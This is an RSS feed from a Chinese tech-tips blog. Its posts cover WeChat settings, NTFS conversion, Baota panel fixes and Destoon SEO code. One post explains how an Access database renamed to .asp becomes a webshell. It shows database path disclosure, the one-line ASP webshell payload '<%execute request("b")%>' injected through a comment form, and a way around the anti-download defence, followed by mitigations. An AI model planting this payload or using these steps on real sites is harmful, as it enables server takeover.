<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>伍陆一笔记</title><link>http://www.561g.com/</link><description>生活随笔，经验分享</description><generator>RainbowSoft Studio Z-Blog 2.3 Avengers Build 180518</generator><language>zh-CN</language><pubDate>Tue, 24 Mar 2026 09:24:14 +0800</pubDate><item><title>朋友圈怎么恢复全部可见</title><author>null@null.com (ziyang)</author><link>http://www.561g.com/post/10.html</link><pubDate>Mon, 26 Jun 2023 07:29:18 +0800</pubDate><guid>http://www.561g.com/post/10.html</guid><description><![CDATA[<p>演示机型：Iphone 13&amp;&amp;华为P50&amp;&amp;小米11</p><p><br/></p><p>系统版本：iOS 15&amp;&amp;HarmonyOS 2&amp;&amp;MIUI 12.5</p><p><br/></p><p>APP版本：微信8.0.15</p><p><br/></p><p>朋友圈怎么恢复全部可见共有4步。本操作方法适用于Iphone 13、华为P50、小米11三种机型。以下是Iphone 13中朋友圈恢复全部可见的具体操作步骤：</p><p>操作/步骤</p><p>1打开微信点击我</p><p>在手机桌面打开微信，点击我。</p><p><br/></p><p>2点击设置进入隐私</p><p>点击设置选项，点击进入隐私。</p><p><br/></p><p>3点击选项</p><p>选择点击“允许朋友查看朋友圈的范围”选项。</p><p><br/></p><p>4点击全部点击完成</p><p><br/></p><p>选择点击全部，点击完成即可。</p><p><br/></p><p>以上就是关于朋友圈怎么恢复全部可见的具体操作步骤，希望对大家有帮助。</p><p><br/></p>]]></description><category>生活随笔</category><comments>http://www.561g.com/post/10.html#comment</comments><wfw:commentRss>http://www.561g.com/feed.asp?cmt=10</wfw:commentRss></item><item><title>u盘有空间 对于目标文件系统文件过大怎么办  提示目标文件过大的解决方法</title><author>null@null.com (ziyang)</author><link>http://www.561g.com/post/9.html</link><pubDate>Fri, 23 Jun 2023 17:51:40 +0800</pubDate><guid>http://www.561g.com/post/9.html</guid><description><![CDATA[<p>　u盘是拷贝、传输文件常用的设备，但是有小伙伴在拷贝电脑文件的时候，明明u盘有空间，但是提示目标文件过大的情况，那么对于目标文件系统文件过大怎么办？今天小编就来告诉一下大家具体的两种解决方法，这两种方法选一即可，希望可以帮到大家。</p><p>　　对于目标文件系统文件过大怎么办</p><p>　　出现这种问题的原因为U盘的文件系统为FAT32或者fs，默认的最大文件不能超过4GB，所以我们需要将文件系统修改为NTFS，此时将不受限制。</p><p>　　方法一、</p><p>　　1、 按下 win+r 打开运行窗口；</p><p>　　2、 输入 cmd ，并按下回车键；</p><p>　　3、 在打开页面中，输入命令 convert G:/fs:ntfs ，其中G代表需要改的文件系统盘符。</p><p>　　方法二、</p><p>　　1、 将U盘插入电脑，点击选中该U盘；</p><p>　　2、 右键点击U盘，在出现的选项菜单中点击选择“ 格式化 ”；</p><p><img src="http://www.561g.com/zb_users/upload/2023/6/2023062364422285.jpg" title="111.jpg"/></p><p>　　3、 在格式化窗口中的“ 文件系统 ”选项处选择“ NTFS ”，然后勾选“ 快速格式化 ”最后点击下方的开始，等待完成即可。</p><p><br/></p>]]></description><category>网络技巧</category><comments>http://www.561g.com/post/9.html#comment</comments><wfw:commentRss>http://www.561g.com/feed.asp?cmt=9</wfw:commentRss></item><item><title>宝塔一键迁移数据库0字节的问题</title><author>null@null.com (ziyang)</author><link>http://www.561g.com/post/8.html</link><pubDate>Wed, 31 May 2023 09:48:55 +0800</pubDate><guid>http://www.561g.com/post/8.html</guid><description><![CDATA[<p>宝塔一键迁移数据库0字节的问题，是数据库密码错误，需要点击数据库重置root密码就行</p>]]></description><category>经验分享</category><comments>http://www.561g.com/post/8.html#comment</comments><wfw:commentRss>http://www.561g.com/feed.asp?cmt=8</wfw:commentRss></item><item><title>Destoon供应发布成功后添加自动推送百度功能</title><author>null@null.com (ziyang)</author><link>http://www.561g.com/post/7.html</link><pubDate>Tue, 16 May 2023 14:39:59 +0800</pubDate><guid>http://www.561g.com/post/7.html</guid><description><![CDATA[<p>想要百度来流量，想要客户评价好，当然要让客户发布的信息第一时间推送给百度，才能快速收录。</p><p>首先，登陆百度站长平台，链接提交，找到接口调用地址。</p><p>然后打开Destoon目录下</p><p>Module目录下的sell下的sell.class.php，</p><p>查找check</p><p>可以看到这个函数是审核通过供应信息的，在getone的下一行加入：</p><pre class="brush:php;toolbar:false">##推送百度

$urls&nbsp;=&nbsp;array(
$item[&#39;linkurl&#39;]
);
$api&nbsp;=&nbsp;&#39;http://data.zz.baidu.com/urls?site=www.xxxx.com&amp;token=这行替换百度站长平台获取的token&#39;;
$ch&nbsp;=&nbsp;curl_init();
$options&nbsp;=&nbsp;&nbsp;array(
CURLOPT_URL&nbsp;=&gt;&nbsp;$api,
CURLOPT_POST&nbsp;=&gt;&nbsp;true,
CURLOPT_RETURNTRANSFER&nbsp;=&gt;&nbsp;true,
CURLOPT_POSTFIELDS&nbsp;=&gt;&nbsp;implode(&quot;\n&quot;,&nbsp;$urls),
CURLOPT_HTTPHEADER&nbsp;=&gt;&nbsp;array(&#39;Content-Type:&nbsp;text/plain&#39;),
);
curl_setopt_array($ch,&nbsp;$options);
$result&nbsp;=&nbsp;curl_exec($ch);</pre><p>如果是资讯，需要到Module/article目录下面找article.class.php</p>]]></description><category>php知识</category><comments>http://www.561g.com/post/7.html#comment</comments><wfw:commentRss>http://www.561g.com/feed.asp?cmt=7</wfw:commentRss></item><item><title>access改mdb为asp所带来的灾难 附mdb防下载方法</title><author>null@null.com (ziyang)</author><link>http://www.561g.com/post/6.html</link><pubDate>Sun, 14 May 2023 17:54:54 +0800</pubDate><guid>http://www.561g.com/post/6.html</guid><description><![CDATA[<p>先不说直接改后缀，直接可以用网快等工具直接下载，其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。</p><p><br/></p><p>一．思路&nbsp;</p><pre class="brush:as3;toolbar:false">　　大家都知道&lt;％％&gt;为asp文件的标志符，也就是说一个asp文件只会去执行&lt;％％&gt;之间的代码，
　　access＋asp的web系统的所有数据都是存放在数据库文件里（mdb文件），由于管理者把mdb文件改为了asp文件，
　　如果我们提交的数据里包含有&lt;％％&gt;，那当我们访问这个asp数据库的时候就会去执行&lt;％％&gt;之间的代码。
　　这样导致我们只提交恶意代码给数据库，那么asp后缀的数据库就是我们的webshell了。</pre><p><br/></p><p>二．示例&nbsp;</p><p><br/></p><p>　　随便找个目标，首先我们暴库，看是不是asp后缀的数据库：http://127.0.0.1/test/dlog%5cshowlog.asp?cat_id=5&amp;log_id=210</p><p><br/></p><p>　　返回：&nbsp;</p><p><br/></p><p><br/></p><p>&nbsp;代码如下:</p><p><br/></p><p>Microsoft VBScript 编译器错误 错误 &#39;800a03f6&#39;&nbsp;</p><p>缺少 &#39;End&#39;</p><p><br/></p><p>/iisHelp/common/500-100.asp，行242</p><p><br/></p><p>Microsoft JET Database Engine 错误 &#39;80004005&#39;</p><p><br/></p><p>&#39;D:\log_mdb\%29dlog_mdb%29.asp&#39;不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。</p><p><br/></p><p>/test/conn.asp，行18</p><p><br/></p><p>　　我们提交：http://127.0.0.1/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的乱码，这样我们可以直接用网际快车等工具直接下载数据库（这里我们不讨论）。我们回到主页看到有提供“网友评论”功能。我们注册个用户，发一条评论：</p><pre class="brush:as3;toolbar:false">&lt;％execute&nbsp;request(&quot;b&quot;)％&gt;</pre><pre class="brush:as3;toolbar:false">　　这样我们就把asp代码：&lt;％execute&nbsp;request(&quot;b&quot;)％&gt;写入了数据库，那么数据库：就是我们的webshell咯。
　　提交：http://127.0.0.1/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在乱码的最后我们看到：</pre><p><br/></p><p>&nbsp;代码如下:</p><p><br/></p><p>/iisHelp/common/500-100.asp，行242&nbsp;</p><p>Microsoft VBScript 运行时错误 错误 &#39;800a000d&#39;</p><p><br/></p><p>类型不匹配: &#39;execute&#39;</p><p><br/></p><p>/test/dlog/log_mdb/%29dlog_mdb%29.asp，行1266</p><pre class="brush:as3;toolbar:false">　　注意：我们在向数据库提交代码时，代码内容不可以太大。所以我们采用&lt;％execute&nbsp;request(&quot;b&quot;)％&gt;。</pre><p><br/></p><p>三．其他一些问题和思路&nbsp;</p><p><br/></p><p>　　１．对于改了后缀为asp，还对数据库里加入了</p><pre class="brush:as3;toolbar:false">&lt;％=&#39;a&#39;-1％&gt;</pre><p>等非法的asp代码来彻底防止下载的数据库，由于里面存在了非法的asp代码，插入我们的webshell代码后运行，将只会显示前面非法代码的错误，而不去执行我们shell的代码。虽然这样可以防止一定的攻击，但还是存在一定的隐患，我们只要在出错的代码前加入兼容错误的代码，就可以得到正确显示执行我们插入的webshell代码了。<br/></p><p><br/></p><p><br/></p><p>　　２．对于没有改后缀的，也就是mdb文件，这样我们可以先直接下载下来得到后台密码，进了后台，可以利用数据库备用改后缀为asp。</p><p><br/></p><p>mdb防下载方法小结</p><p><br/></p><p>1:在iis6下面 如果一个扩展名没有被定义则 访问的时候会出现文件没有找到的404错误。&nbsp;</p><p>因此你可以将数据库任意命名成一个绝对不会出现的文件名就可以达到安全的效果比如：xxxxx.xxxxxxxxxxx</p><p><br/></p><p>2 将数据库放在网站的外部，那绝对就不能访问得到了。例如： e:/web/是你的网站&nbsp;</p><p>则把数据库放在e:/</p><p><br/></p><p>3 正如上面所说的 将.mdb 改成 .asp 同时倒入一个特殊的表 包含 &lt;% 的二进制字符 这样访问文件出现 缺少脚本关闭符的提示。&nbsp;</p><p>4 或者将.mdb 改成.asp 同时用winhex打开 可以发现176以后有很长一部分 00 字符串 你随便在处改成一段asp代码 也可以实现防止下载，这样也不影响数据库功能。例如：&nbsp;</p><pre class="brush:as3;toolbar:false">&lt;%&nbsp;
response.write(&quot;非法访问&quot;)&nbsp;
response.end()&nbsp;
%&gt;</pre><p><br/></p><p>现在在数据库的名称里 加上 “#” 和空格 都被破解了 比如“#” = “&lt;%35” 而空格 = “&lt;%20”</p><p><br/></p><p>所以说 现在用这些已经不管用了。。</p><p><br/></p><p>如果是自己的服务器的话就在IIS里设置一下：</p><p><br/></p><p>新建一个空白的DLL文件，然后在IIS里添加映射，可执行文件选刚才建的这个DLL，扩展名填.mdb，保存后重启一下IIS服务即可。</p><p><br/></p>]]></description><category>网络技巧</category><comments>http://www.561g.com/post/6.html#comment</comments><wfw:commentRss>http://www.561g.com/feed.asp?cmt=6</wfw:commentRss></item><item><title>mdb数据库转成asp好处是什么</title><author>null@null.com (ziyang)</author><link>http://www.561g.com/post/5.html</link><pubDate>Sun, 14 May 2023 17:48:11 +0800</pubDate><guid>http://www.561g.com/post/5.html</guid><description><![CDATA[<p>问：我经常在下过来的一些代码中看数据库的后缀是asp形式的，不知道这个有什么好处，还有md5加密是不是一般都用在管理员密码和帐号上?</p><p><br/></p><p><br/></p><h3>答：简单来说, 就是防止数据库被下载..</h3><p><br/></p><p>改成 ASP格式 输入网址访问的时候 文件 就会被当成 ASP文件 解析</p><p>在数据库中新建一个表</p><p>里面写上 错误的ASP程序代码</p><p>那么 当数据库被当成 ASP文件 解析的时候</p><p>运行到错误的 ASP程序代码 网页就会报错, 数据库就不会下载成功.</p><p>md5 是不可逆转的 加密方式</p><p>验证的时候 是通过 再次使用MD5加密你 输入的密码 来匹配 数据库里面的 申请时的MD5加密的密码 来判断是否 可登录的</p><p>所以 别人就算拿到 MD5 密码 也破解不到真实密码</p><p>但是 有些网站 有一个很庞大的 MD5 密码数据库</p><p>数据库库里面 存放了 大量简单的 MD5 密码</p><p>所以 只要 原始密码 比较复杂 用MD5加密一次 一般不会被破解的</p><p><br/></p>]]></description><category>网络技巧</category><comments>http://www.561g.com/post/5.html#comment</comments><wfw:commentRss>http://www.561g.com/feed.asp?cmt=5</wfw:commentRss></item><item><title>宝塔面板 destoon的404页面怎么设置</title><author>null@null.com (ziyang)</author><link>http://www.561g.com/post/4.html</link><pubDate>Thu, 11 May 2023 12:08:54 +0800</pubDate><guid>http://www.561g.com/post/4.html</guid><description><![CDATA[<p>由于宝塔默认配置下404的页面路径为根目录下的/404.html，用户如果没有在网站根目录下配置404页面，就会显示错误提示</p><p><br/></p><p>进到网站服务器后台配置404页面。点击左侧“网站”选择正在运行或需要配置的网站，点击右侧“设置”</p><p><br/></p><p>重要（★）进入到服务器配置界面后，点击“配置文件”找到“第13行”的代码，删除前面的“#”号,</p><p><img src="http://www.561g.com/zb_users/upload/2023/5/2023051143909113.jpg" title="宝塔面板&nbsp;destoon的404页面怎么设置"/></p><p>按前面步骤操作完成后，返回到网站在网址/后面随便输入一些数字或代码，点击回车键，就会跳转到新的404页面。</p><p><br/></p><p>三种不同配置的方法：</p><p>1、虚拟空间设置：</p><p>现在的idc提供商基本都提供404设置的功能，直接上传文件设置即可。</p><p><br/></p><p>2、IIS下设置：</p><p>在IIS管理器中右键单击要管理的网站，打开&quot;属性&quot;中的&quot;自定义错误信息&quot;页，为&quot;404&quot;设定相应的错误信息页即可。</p><p><br/></p><p>3、Apache下设置：</p><p>在 .htaccess 文件中加入如下内容即可：ErrorDocument 404 /notfound.php。</p><p><br/></p>]]></description><category>网络技巧</category><comments>http://www.561g.com/post/4.html#comment</comments><wfw:commentRss>http://www.561g.com/feed.asp?cmt=4</wfw:commentRss></item></channel></rss>
